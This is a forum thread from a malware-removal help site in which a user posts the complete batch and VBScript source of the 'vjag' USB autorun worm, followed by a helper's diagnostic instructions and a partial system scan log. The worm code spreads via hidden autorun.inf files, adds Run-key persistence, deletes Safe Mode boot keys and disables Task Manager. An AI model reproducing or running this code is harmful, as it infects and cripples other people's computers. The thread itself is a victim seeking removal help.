Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

vjag virus


  • This topic is locked This topic is locked
15 replies to this topic

#1 nightjar59

nightjar59

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:10:36 AM

Posted 02 April 2009 - 11:47 AM

So I got the auto run folder from the pen drive under linux and these are the files in it.

vjag.bat
@echo off
call %windir%\system32\auto\vjag1.bat
exit


vjag.vbs
if Month(Date)=20 and Day(Date)=22 then
a=msgbox("::::::......My Birthday......::::::",,"vjag:::::..999..:::::")
else
Set ws = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
Set car = fso.GetSpecialFolder(1)
v = car.Path
do
ws.run ""&v&"\auto\vjag.bat open" ,0, false
WScript.Sleep 40000
Loop
end if


vjag1.bat
@echo off
if exist j:\ goto j
if not "%1"=="" goto i

:j
cls
if exist j:\auto attrib +h +s j:\auto&attrib +h +s j:\autorun.inf
xcopy /I /y %windir%\system32\auto j:\auto
echo [autorun] >j:\autorun.inf
echo OPEN=auto\vstart.bat >>j:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>j:\autorun.inf
echo shell\open\Default=1 >>j:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>j:\autorun.inf
attrib +h +s j:\auto
attrib +h +s j:\autorun.inf

:i
if exist i:\ goto i1
if not "%1"=="" goto h

:i1
cls
if exist i:\auto attrib +h +s i:\auto&attrib +h +s i:\autorun.inf
xcopy /I /y %windir%\system32\auto i:\auto
echo [autorun] >i:\autorun.inf
echo OPEN=auto\vstart.bat >>i:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>i:\autorun.inf
echo shell\open\Default=1 >>i:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>i:\autorun.inf
attrib +h +s i:\auto
attrib +h +s i:\autorun.inf

:h
if exist h:\ goto h1
if not "%1"=="" goto g

:h1
cls
if exist h:\auto attrib +h +s h:\auto&attrib +h +s h:\autorun.inf
xcopy /I /y %windir%\system32\auto h:\auto
echo [autorun] >h:\autorun.inf
echo OPEN=auto\vstart.bat >>h:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>h:\autorun.inf
echo shell\open\Default=1 >>h:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>h:\autorun.inf
attrib +h +s h:\auto
attrib +h +s h:\autorun.inf

:g
if exist g:\ goto g1
if not "%1"=="" goto f

:g1
cls
if exist g:\auto attrib +h +s g:\auto&attrib +h +s g:\autorun.inf
xcopy /I /y %windir%\system32\auto g:\auto
echo [autorun] >g:\autorun.inf
echo OPEN=auto\vstart.bat >>g:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>g:\autorun.inf
echo shell\open\Default=1 >>g:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>g:\autorun.inf
attrib +h +s g:\auto
attrib +h +s g:\autorun.inf

:f
if exist f:\ goto f1
if not "%1"=="" goto e

:f1
cls
if exist f:\auto attrib +h +s f:\auto&attrib +h +s f:\autorun.inf
xcopy /I /y %windir%\system32\auto f:\auto
echo [autorun] >f:\autorun.inf
echo OPEN=auto\vstart.bat >>f:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>f:\autorun.inf
echo shell\open\Default=1 >>f:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>f:\autorun.inf
attrib +h +s f:\auto
attrib +h +s f:\autorun.inf

:e
if exist e:\ goto e1
if not "%1"=="" goto d

:e1
cls
if exist e:\auto attrib +h +s e:\auto&attrib +h +s e:\autorun.inf
xcopy /I /y %windir%\system32\auto e:\auto
echo [autorun] >e:\autorun.inf
echo OPEN=auto\vstart.bat >>e:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>e:\autorun.inf
echo shell\open\Default=1 >>e:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>e:\autorun.inf
attrib +h +s e:\auto
attrib +h +s e:\autorun.inf

:d
if exist d:\ goto d1
if not "%1"=="" goto c

:d1
cls
if exist d:\auto attrib +h +s d:\auto&attrib +h +s d:\autorun.inf
xcopy /I /y %windir%\system32\auto d:\auto
echo [autorun] >d:\autorun.inf
echo OPEN=auto\vstart.bat >>d:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>d:\autorun.inf
echo shell\open\Default=1 >>d:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>d:\autorun.inf
attrib +h +s d:\auto
attrib +h +s d:\autorun.inf

:c
attrib +h +s %windir%\system32\vjag.doc
if exist c:\ goto c1
if not "%1"=="" exit

:c1
cls
if exist c:\auto attrib +h +s c:\auto&attrib +h +s c:\autorun.inf
xcopy /I /y %windir%\system32\auto c:\auto
echo [autorun] >c:\autorun.inf
echo OPEN=auto\vstart.bat >>c:\autorun.inf
echo shell\open\Command=auto\vstart.bat >>c:\autorun.inf
echo shell\open\Default=1 >>c:\autorun.inf
echo shell\explore\Command=auto\vstart.bat >>c:\autorun.inf
attrib +h +s c:\auto
attrib +h +s c:\autorun.inf
exit


vjag2.bat
@echo off
title cura
reg delete hklm\software\microsoft\windows\currentversion\run /v vjag /f
reg delete hklm\software\microsoft\windows\currentversion\run /v vjag2 /f
reg delete hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistryTools /f
reg delete hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /f
reg delete hkcu\software\microsoft\windows\currentversion\policies\explorer /v Restrictrun /f
reg delete hklm\software\microsoft\windows\currentversion\run /v vjag3 /f
cls
del /f /q %windir%\system32\auto
del /f /q %windir%\syste.txt
del /f /q %windir%\systeb.txt
del /f /q %windir%\systec.txt
del /f /q %windir%\systed.txt
del /f /q %windir%\systee.txt
del /f /q %windir%\systef.txt
del /f /q %windir%\systeg.txt
del /f /q %windir%\systeh.txt
cls
del /f /q %windir%\systei.txt
del /f /q %windir%\systej.txt
del /f /q %windir%\systek.txt
del /f /q %windir%\systel.txt
del /f /q %windir%\system.txt
del /f /q %windir%\systen.txt
del /f /q %windir%\systeo.txt
del /f /q %windir%\systep.txt
del /f /q %windir%\systeq.txt
goto asd

:asd
if exist j:\ goto j
if not "%1"=="" goto i

:j
cls
attrib -h -s autorun.inf
del /f /q j:\autorun.inf
del /f /q j:\auto

:i
if exist i:\ goto i1
if not "%1"=="" goto h

:i1
attrib -h -s autorun.inf
del /f /q i:\autorun.inf
del /f /q i:\auto

:h
if exist h:\ goto h1
if not "%1"=="" goto g

:h1
cls
attrib -h -s autorun.inf
del /f /q h:\autorun.inf
del /f /q h:\auto

:g
if exist g:\ goto g1
if not "%1"=="" goto f

:g1
cls
attrib -h -s autorun.inf
del /f /q g:\autorun.inf
del /f /q g:\auto

:f
if exist f:\ goto f1
if not "%1"=="" goto e

:f1
cls
attrib -h -s autorun.inf
del /f /q f:\autorun.inf
del /f /q f:\auto

:e
if exist e:\ goto e1
if not "%1"=="" goto d

:e1
cls
attrib -h -s autorun.inf
del /f /q e:\autorun.inf
del /f /q e:\auto

:d
if exist d:\ goto d1
if not "%1"=="" goto c

:d1
cls
attrib -h -s autorun.inf
del /f /q d:\autorun.inf
del /f /q d:\auto

:c
if exist c:\ goto c1
if not "%1"=="" exit

:c1
cls
attrib -h -s autorun.inf
del /f /q c:\autorun.inf
del /f /q c:\auto
exit


vjag2.vbs
cla=inputbox("Intro Clave",":::...Cuadro de clave...:::::...boxpasword...:::")
if not(cla=220385) then
v=msgbox("Incorrecto",,"Incorret")
else
Set ws = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
Set car = fso.GetSpecialFolder(1)
v = car.Path
ws.run ""&v&"\auto\vjag2.bat open" ,0, false
x=msgbox("::::..Correcto virus Finalizado..::::",,"::::..Corret end virus..::::")
end if


vjag3.bat
@echo off
if exist %windir%\syste.txt goto a
reg add hklm\software\microsoft\windows\currentversion\run /v vjag /d %windir%\system32\auto\vjag3.bat /f
reg add hklm\software\microsoft\windows\currentversion\run /v vjag2 /d %windir%\system32\auto\vjag.vbs /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disableregistryTools /t reg_dword /d 1 /f
reg delete hklm\System\CurrentControlSet\Control\SafeBoot /f
reg add hkcu\software\microsoft\windows\currentversion\policies\system /v disabletaskmgr /t reg_dword /d 1 /f
echo 1 >%windir%\syste.txt
echo Cuenta regresiva desde el 15 Bitacora de un infectado >%windir%\system32\vjag.doc
echo . >>%windir%\system32\vjag.doc
goto vir

:a
cls
if exist %windir%\systeb.txt goto b
echo 1 >%windir%\systeb.txt
echo 15.- %date% %time% Me instale en tu pc y Tome control del registro de windows >>%windir%\system32\vjag.doc
goto vir

:b
cls
if exist %windir%\systec.txt goto c
echo 1 >%windir%\systec.txt
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer /v Restrictrun /t reg_dword /d 1 /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 1 /d vjag.vbs /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 2 /d notepad.exe /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 3 /d winword.exe /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 4 /d explorer.exe /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 5 /d powerpnt.exe /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 6 /d vj.doc /f
cls
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 7 /d excel.exe /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 8 /d vjag3.bat /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 8 /d vjag1.bat /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 9 /d vjag2.vbs /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 10 /d vjag.bat /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 11 /d vjag2.bat /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 12 /d vstart.bat /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 13 /d autorun.inf /f
reg add hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 14 /d vjag.doc /f
cls
echo . >>%windir%\system32\vjag.doc
echo 14.- %date% %time% Toma de control de los backup de windows >>%windir%\system32\vjag.doc
goto vir

:c
cls
if exist %windir%\systed.txt goto d
echo 1 >%windir%\systed.txt
echo . >>%windir%\system32\vjag.doc
echo 13.- %date% %time% Fue Bloqueado modo seguro de windows >>%windir%\system32\vjag.doc
goto vir

:d
cls
if exist %windir%\systee.txt goto e
echo 1 >%windir%\systee.txt
echo . >>%windir%\system32\vjag.doc
echo 12.- %date% %time% Desactivado el administrador de tareas si no sabes que es sale cuando oprimes ..ctrl alt supr.. >>%windir%\system32\vjag.doc
goto vir

:e
cls
if exist %windir%\systef.txt goto f
echo 1 >%windir%\systef.txt
echo . >>%windir%\system32\vjag.doc
echo 11.- %date% %time% Reposo:::...informacion:::El reposo fue dado segun las veces que encendiste el ordenador si fue una sola vez al dia entonces las fases del virus fueron una cada dia ...de lo contrario las fases se dieron tantas veces como encendiste el pc en ese dia.. >>%windir%\system32\vjag.doc
goto vir

:f
cls
if exist %windir%\systeg.txt goto g
echo 1 >%windir%\systeg.txt
echo . >>%windir%\system32\vjag.doc
echo 10.- %date% %time% Reposo::: >>%windir%\system32\vjag.doc
goto vir

:g
cls
if exist %windir%\systeh.txt goto h
echo 1 >%windir%\systeh.txt
echo . >>%windir%\system32\vjag.doc
echo 09.- %date% %time% Reposo::: >>%windir%\system32\vjag.doc
goto vir

:h
cls
if exist %windir%\systei.txt goto i
echo 1 >%windir%\systei.txt
echo . >>%windir%\system32\vjag.doc
echo 08.- %date% %time% ::: Fue restringido el acceso a la mayoria de los programas excepto algunos de Office y Block de Notas >>%windir%\system32\vjag.doc
goto vir

:i
cls
if exist %windir%\systej.txt goto j
echo 1 >%windir%\systej.txt
echo . >>%windir%\system32\vjag.doc
echo 07.- %date% %time% Reposo::: >>%windir%\system32\vjag.doc
goto vir

:j
cls
if exist %windir%\systek.txt goto k
echo 1 >%windir%\systek.txt
echo . >>%windir%\system32\vjag.doc
echo 06.- %date% %time% Reposo::: >>%windir%\system32\vjag.doc
goto vir

:k
cls
if exist %windir%\systel.txt goto l
echo 1 >%windir%\systel.txt
echo . >>%windir%\system32\auto\vjag.doc
echo 05.- %date% %time% Reposo::: >>%windir%\system32\vjag.doc
goto vir

:l
cls
if exist %windir%\system.txt goto m
echo 1 >%windir%\system.txt
reg delete hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 5 /f
echo . >>%windir%\system32\vjag.doc
echo 04.- %date% %time% ::Se restringio acceso a Microsoft Office PowerPoint >>%windir%\system32\vjag.doc
goto vir

:m
cls
if exist %windir%\systen.txt goto n
echo 1 >%windir%\systen.txt
reg delete hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 6 /f
echo . >>%windir%\system32\vjag.doc
echo 03.- %date% %time% ::Se restringio acceso a Microsoft Office Excel >>%windir%\system32\vjag.doc
goto vir

:n
cls
if exist %windir%\systeo.txt goto o
echo 1 >%windir%\systeo.txt
reg delete hkcu\software\microsoft\windows\currentversion\policies\explorer\restrictrun /v 3 /f
echo . >>%windir%\system32\vjag.doc
echo 02.- %date% %time% ::Se restringio acceso a Microsoft Office Word ::: Con esto casi se cerraron las oportunidades de poder quitar este virus >>%windir%\system32\vjag.doc
reg add hklm\software\microsoft\windows\currentversion\run /v vjag3 /d %windir%\system32\auto\vjag2.vbs /f
start %windir%\system32\auto\vj.doc
start %windir%\system32\auto\vjag2.vbs
goto vir

:thumbup2:
cls
if exist %windir%\systep.txt goto p
echo 1 >%windir%\systep.txt
echo . >>%windir%\system32\vjag.doc
echo 01.- %date% %time% :: En esta estapa ya solo faltaba un reinicio mas si ya estas leyendo esto quiere decir que se cumplio::: Tengo el control total de windows >>%windir%\system32\vjag.doc
goto vir

:)
cls
if exist %windir%\systeq.txt goto vir
echo 1 >%windir%\systeq.txt
echo . >>%windir%\system32\vjag.doc
echo 00.- %date% %time% Fase terminar del virus es una lastima que hallas llegado hasta esta fase, El virus esta completamente ejecutado podras hacer respaldo de tu informacion ::--La que se salvo je je--:: >>%windir%\system32\vjag.doc
reg delete hklm\software\microsoft\windows\currentversion\run /v vjag3 /f
start %windir%\system32\vjag.doc
goto vir

:vir
taskkill /im cmd.exe /f /t
cls
exit


vstart
@echo off
set a=%dir%\%0
set b=%a:~2,3%
xcopy /I /y %dir%\auto %windir%\system32\auto
start explorer %b%
goto j

:j
start %windir%\system32\auto\vjag3.bat
start %windir%\system32\auto\vjag.vbs
attrib +h +s +r %windir%\system32\auto
exit


vstart.bat.VIR
@echo off
set a=%dir%\%0
set b=%a:~2,3%
xcopy /I /y %dir%\auto %windir%\system32\auto
start explorer %b%
goto j

:j
start %windir%\system32\auto\vjag3.bat
start %windir%\system32\auto\vjag.vbs
attrib +h +s +r %windir%\system32\auto
exit

So if you can help me?

BC AdBot (Login to Remove)

 


#2 Farbar

Farbar

    Just Curious


  • Security Developer
  • 21,689 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:The Netherlands
  • Local time:05:36 PM

Posted 02 April 2009 - 01:30 PM

Hi nightjar59,

Welcome to BC HijackThis forum and sorry for the delay. I am farbar. I am going to assist you with your problem.

Please refrain from making any changes to your system (updating Windows, installing applications, removing files, etc.) from now on as it might prolong handling your log and make the job for both of us more difficult.

Well done and thanks for posting the content of auto folder. I have made a fix but need to confirm the changes the malware has made and some additional information.
  • Please describe the problem as clear as possible.

  • Please download OTViewIt by OldTimer.
  • Save it to your desktop.
  • Important: Rename it to powerpnt.exe
  • Double click on the powerpnt.exe on your desktop.
  • Click the "Scan All Users" checkbox.
  • Set File age to 60 days.
  • Type in the Custom Scans section: hijackthisbackups
  • Click Run Scan button.
  • Two reports will open, copy and paste them to your reply:
  • OTViewIt.txt <-- Will be opened
  • Extra.txt <-- Will be minimized

[*]Please download HiJackThis.exe and save it to C: drive. This application doesn't need installation.
Important: Rename it to excel.exe
Double-click on excel.exe. Click Do a system scan and save a logfile then copy and paste the content of the log to your reply.
[/list]

You might want to save this page on your favorites, so you can find it again when you return.

#3 nightjar59

nightjar59
  • Topic Starter

  • Members
  • 10 posts
  • OFFLINE
  •  
  • Local time:10:36 AM

Posted 02 April 2009 - 01:53 PM

OTviewIt
OTViewIt logfile created on: 4/2/2009 1:47:47 PM - Run 2
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\dreger\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1021.98 Mb Total Physical Memory | 493.18 Mb Available Physical Memory | 48.26% Memory free
2.41 Gb Paging File | 1.93 Gb Available in Paging File | 80.22% Paging File free
Paging file location(s): C:\pagefile.sys 1536 3072;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 37.24 Gb Total Space | 6.29 Gb Free Space | 16.89% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
Drive E: | 1.86 Gb Total Space | 0.16 Gb Free Space | 8.32% Space Free | Partition Type: FAT
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 001_23_TEACHER
Current User Name: dreger
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== Processes ==========

[2006/11/03 19:19:58 | 00,013,592 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MsMpEng.exe
[2008/09/24 17:55:27 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe
[2009/02/05 15:01:25 | 00,018,752 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
[2009/02/05 15:08:40 | 00,138,680 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\ashServ.exe
[2005/09/20 09:32:24 | 00,077,824 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\hkcmd.exe
[2005/09/20 09:36:20 | 00,114,688 | ---- | M] (Intel Corporation) -- C:\WINDOWS\system32\igfxpers.exe
[2008/01/11 22:16:38 | 00,039,792 | ---- | M] (Adobe Systems Incorporated) -- C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
[2009/03/24 14:25:19 | 00,136,600 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jusched.exe
[2006/11/03 19:20:12 | 00,866,584 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Windows Defender\MSASCui.exe
[2008/03/30 10:36:40 | 00,267,048 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunesHelper.exe
[2003/05/08 11:00:58 | 00,049,152 | ---- | M] (ScanSoft, Inc.) -- C:\Program Files\ScanSoft\OmniPageSE2.0\opwareSE2.exe
[2009/02/05 15:08:45 | 00,081,000 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\ashDisp.exe
[2009/01/28 07:32:24 | 00,245,760 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALMon.exe
[2005/07/22 03:47:22 | 00,151,552 | ---- | M] () -- C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe
[2004/02/13 14:12:08 | 00,016,423 | ---- | M] () -- C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe
[2007/11/02 05:48:46 | 04,519,176 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardTools.exe
[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe
[2007/11/02 05:48:34 | 02,090,248 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Aware.exe
[2009/03/24 14:25:19 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
[2007/11/02 05:48:40 | 03,990,792 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\Marker.exe
[2008/10/27 09:55:45 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe
[2009/04/02 05:04:19 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe
[2009/01/28 07:32:14 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe
[2009/04/02 05:04:15 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
[2008/08/07 15:48:30 | 00,192,512 | ---- | M] (Lightspeed Systems) -- C:\Program Files\Lightspeed Systems\User Agent\UAService.exe
[2009/04/02 05:04:39 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe
[2008/10/16 15:09:44 | 00,051,224 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\wuauclt.exe
[2009/04/02 13:33:26 | 00,422,912 | ---- | M] (OldTimer Tools) -- C:\Documents and Settings\dreger\Desktop\powerpnt.exe.exe
[2008/04/14 05:42:30 | 00,069,120 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\notepad.exe

========== (O23) Win32 Services ==========

[2008/02/18 11:16:30 | 00,110,592 | ---- | M] (Apple, Inc.) -- C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe -- (Apple Mobile Device [Auto | Running])
[2007/10/24 01:47:22 | 00,033,800 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe -- (aspnet_state [On_Demand | Stopped])
[2009/02/05 15:01:25 | 00,018,752 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe -- (aswUpdSv [Auto | Running])
[2009/02/05 15:08:40 | 00,138,680 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\ashServ.exe -- (avast! Antivirus [Auto | Running])
[2009/02/05 15:08:26 | 00,254,040 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe -- (avast! Mail Scanner [On_Demand | Stopped])
[2009/02/05 15:06:04 | 00,352,920 | ---- | M] (ALWIL Software) -- C:\Program Files\Alwil Software\Avast4\ashWebSv.exe -- (avast! Web Scanner [On_Demand | Stopped])
[2008/01/11 17:50:16 | 00,030,312 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Small Business\Business Contact Manager\BcmSqlStartupSvc.exe -- (BcmSqlStartupSvc [Auto | Running])
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe -- (Bonjour Service [Auto | Running])
[2007/10/24 01:47:40 | 00,070,144 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe -- (clr_optimization_v2.0.50727_32 [On_Demand | Stopped])
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe -- (dkab_device [On_Demand | Stopped])
[2007/10/09 12:58:12 | 00,036,864 | ---- | M] (Microsoft Corporation) -- c:\WINDOWS\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe -- (FontCache3.0.0.0 [On_Demand | Stopped])
[2009/03/03 14:53:08 | 00,033,176 | ---- | M] (NOS Microsystems Ltd.) -- C:\Program Files\NOS\bin\getPlus_HelperSvc.exe -- (getPlus® Helper [On_Demand | Stopped])
[2009/03/17 12:57:18 | 00,138,168 | ---- | M] (Google) -- C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe -- (gusvc [On_Demand | Stopped])
[2007/10/11 09:55:10 | 00,864,256 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe -- (idsvc [Unknown | Stopped])
[2008/03/30 10:36:30 | 00,504,104 | ---- | M] (Apple Inc.) -- C:\Program Files\iPod\bin\iPodService.exe -- (iPod Service [On_Demand | Running])
[2009/03/24 14:25:19 | 00,152,984 | ---- | M] (Sun Microsystems, Inc.) -- C:\Program Files\Java\jre6\bin\jqs.exe -- (JavaQuickStarterService [Auto | Running])
File not found -- -- (KodakCCS [On_Demand | Stopped])
[2003/06/19 23:25:00 | 00,322,120 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE -- (MDM [Auto | Running])
[2008/11/24 22:31:10 | 29,263,712 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe -- (MSSQL$MSSMLBIZ [On_Demand | Stopped])
[2008/11/24 22:31:08 | 00,045,408 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqladhlp90.exe -- (MSSQLServerADHelper [Disabled | Stopped])
[2007/10/11 09:55:14 | 00,122,880 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe -- (NetTcpPortSharing [Disabled | Stopped])
[2007/08/24 03:19:12 | 00,443,776 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE -- (odserv [On_Demand | Stopped])
[2006/10/26 14:03:08 | 00,145,184 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE -- (ose [On_Demand | Stopped])
[2003/05/29 15:52:52 | 00,065,795 | ---- | M] (HP) -- C:\WINDOWS\system32\spool\drivers\w32x86\3\HPZIPM12.EXE -- (Pml Driver HPZ12 [On_Demand | Stopped])
[2008/10/27 09:55:45 | 00,069,632 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SAVAdminService.exe -- (SAVAdminService [Unknown | Running])
[2008/09/24 17:55:27 | 00,098,304 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\SavService.exe -- (SAVService [Unknown | Running])
[2007/11/02 05:48:32 | 01,283,336 | ---- | M] (SMART Technologies Inc.) -- C:\Program Files\SMART Technologies Inc\SMART Board Software\SMARTBoardService.exe -- (SMART Board Service [Auto | Running])
[2007/11/02 05:48:58 | 00,767,240 | ---- | M] () -- C:\Program Files\SMART Technologies Inc\SMART Board Software\WebServer.exe -- (SMART Web Server [On_Demand | Stopped])
[2009/04/02 05:04:19 | 00,266,240 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\ManagementAgentNT.exe -- (Sophos Agent [Auto | Running])
[2009/01/28 07:32:14 | 00,172,032 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\AutoUpdate\ALsvc.exe -- (Sophos AutoUpdate Service [Auto | Running])
[2009/04/02 05:04:39 | 00,393,216 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Sophos Anti-Virus\sdcservice.exe -- (Sophos Device Control Service [Unknown | Running])
[2009/04/02 05:04:15 | 00,794,624 | ---- | M] (Sophos Plc) -- C:\Program Files\Sophos\Remote Management System\RouterNT.exe -- (Sophos Message Router [Auto | Running])
[2008/11/24 22:31:08 | 00,239,968 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe -- (SQLBrowser [Auto | Running])
[2008/11/24 22:31:12 | 00,087,904 | ---- | M] (Microsoft Corporation) -- c:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe -- (SQLWriter [Auto | Running])
